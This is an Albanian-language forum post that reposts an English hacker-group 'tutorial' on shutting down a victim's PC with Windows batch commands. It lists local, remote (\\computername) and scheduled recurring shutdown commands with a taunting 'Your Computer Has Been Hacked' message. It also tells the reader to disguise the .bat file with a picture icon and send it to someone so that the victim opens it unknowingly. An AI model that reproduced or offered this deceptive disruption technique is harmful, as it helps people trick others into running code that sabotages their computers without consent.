Would you like to react to this message? Create an account in a few clicks or log in to continue.

ForumForumiLatest imagesKërkoRegjistrohuidentifikimi

Tutorial per me ja ndal viktimes PC por është Anglisht

Shko poshtë 
AutoriMesazh
LeoO-3nt
..Administrator..
..Administrator..
LeoO-3nt

Numri i postimeve : 573
Vendodhja : WwW.Alba-oNe.tK
Registration date : 25/10/2008

Tutorial per me ja ndal viktimes PC por është Anglisht Empty
MesazhTitulli: Tutorial per me ja ndal viktimes PC por është Anglisht   Tutorial per me ja ndal viktimes PC por është Anglisht Icon_minitimeWed Oct 29, 2008 6:08 am

SHUT DOWN COMPUTER OF THE VICTIME
# By CoNtRoLLeR
# ================================================== ===========================================
#
# Date : 03-027-2006
#
# Subject: Shut Down Victim's PC
#
# From: A.s.c [Albania.Security.Clan] & U.S IT-P.N.E. [U.S IT-Programer Network Engenier]
#
# Tested on Windows XP Profesional Service Pack 2
# Windows Home Editor
#
# This is a little instruct of this tuttorial for shutdown the compiuter of the victime that you have!
# The codes below you have to use them in a Batch File, or by the Commander of the windows => Start => Run => Cmd
# But if You have a victime you have to use them in a Batch File => .bat
#
# So the codes below we have to copy them & paste it in a text document. After you wright this code,you have to save As it
# Like: Hello.bat & after change the display picture icone in a pict & send it to a user. After the user is gonna open it,
# His/Her Computer is gonna Shut Down in 1 Min
# I wish to all geeks Computer To have funn with this
#
# -*'^'~*-,._. Always Thanks To The IT-Programer Network Of The GeeK Squadrilen ._.,-*'^'~*-
#
# -*'^'~*-,._. Thanks To My Albanian Guys Of ~ Albania.Security.Clan Hackers Group ~ ._.,-*'^'~*-
#
# ".,-*-,._-*'^'~*-,._ #Asc @ Irc.AscNet.Biz - Irc.Fier1.Com ~ ._.,-*'^'~*-.,-*-,."
#
# -*'^'~*-,._. EvenThough That I work For The American Network System, My Bloody & My Heart Still For The Albanian Pride ~ ._.,-*'^'~*-
#
# ".,-*-,.- PROUD TO BE ALBANIAN -.,-*-,."
#
# -*'^'~*-,._. Copyright (c) 2006 IT-Programer NetWork Engeniers Of Geek Squad ._.,-*'^'~*-
#================================================= ==============================================

#SHutDOwN.Exe use The Following Syntax:

shutdown \\computername /l /a /r /tx "msg" /y /c

#Example:

shutdown \\computername /l /a /r /t:60 "Get Out Your Computer Has Been Hacked, ShuttingDown Now" /y /c

Save As... => Hallo.bat (Warrning You neet To Know, to specify the remote computer)

#WithOut The ComputerNAme:

shutdown /l /t:60 "Get Out Your Computer Has Been Hacked, ShuttingDown Now" /y /c

Save As... => fileName.Bat (the Compute will be shutDown in 1 Min [it depends on how many sec. did You Put: /t:60 = 1 Min])

#Support:

shutdown \\support /r

Save As... => in-a-BatchFile.Bat (shut down and restart a remote computer)

#ShutDown The Victime Computer In Schedule time:

at 18:30 shutdown /l /r /y /c

Save As... => BatchFileName.bat (The Victime PC will ShutDown & Restart in 6:30 P.M.)

#Shut Down The Victime Pc In Schedule Time & day:

at 18:00 /every:M,T,W,Th,F shutdown /l /r /y /c

Save As... => BatchFileName.bat (The Victime PC will ShutDown & Restart in 6:00 P.M. Every Day Of the Week)
###end

# A.s.c & U.S IT-P.N.E. [03-027-2006]
Mbrapsht në krye Shko poshtë

Tutorial per me ja ndal viktimes PC por është Anglisht
Mbrapsht në krye 
Faqja 1 e 1